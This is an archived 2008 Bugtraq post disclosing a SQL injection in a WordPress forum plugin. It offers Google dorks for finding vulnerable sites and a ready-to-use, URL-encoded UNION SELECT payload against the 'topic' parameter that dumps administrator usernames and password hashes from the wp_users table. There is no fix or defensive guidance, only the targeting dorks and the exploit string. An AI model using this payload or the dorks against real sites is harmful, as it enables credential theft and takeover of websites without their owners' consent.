Bugtraq: all version Wordpress FORUM S () L injection

Nmap Security Scanner

Intro

Ref Guide

Install Guide

Download

Changelog

Book

Docs
Security Lists

Bugtraq

Basics

More
Security Tools

More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

Bugtraq mailing list archives

all version Wordpress FORUM S () L injection

From: hackturkiye.hackturkiye () gmail com
Date: 15 Feb 2008 20:25:56 -0000


###############################################################
# 
#   Wordpress FORUM  ALL VERS&#304;ON SQL Injection
#
###############################################################
#
# AUTHOR : S () BUN 
#
# HOME : http://www.milw0rm.com/author/1334
#        
# MA&#304;L : hackturkiye.hackturkiye () gmail com
#        
# 
################################################################
# 
#  DORK 1 : allinurl: forum  page_id "topic"
# 
#  DORK 2 : allinurl:  page_id "topic"
#
################################################################
 
admin pass and name  small soo
attacker can see username and pass word under page  HOME > FORUMS > name and pass here

admin ismi ve &#351;ifre ufak yaz&#305;yo sayfa alt&#305;nda hemen forumun üst k&#305;m&#305;nda

#################################################################

EXAMPLE= after "forum" inject EXPLO&#304;T

http://www.xxxxxx/?page_id=xxx&forum= [EXPLO&#304;T]

EXPLOIT : 

S () 
BUN&topic=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0,concat(0x7c,user_login,0x7c,user_pass,0x7c),111,222,333,0,0,0,0,0/**/from%2F%2A%2A%2Fwp_users/**where%20id%201%20=%20-1
  

################################################################
# S () BUN           i AM NOT HACKER      S () BUN 
################################################################

By Date By Thread

Current thread:

all version Wordpress FORUM S () L injection hackturkiye . hackturkiye (Feb 15)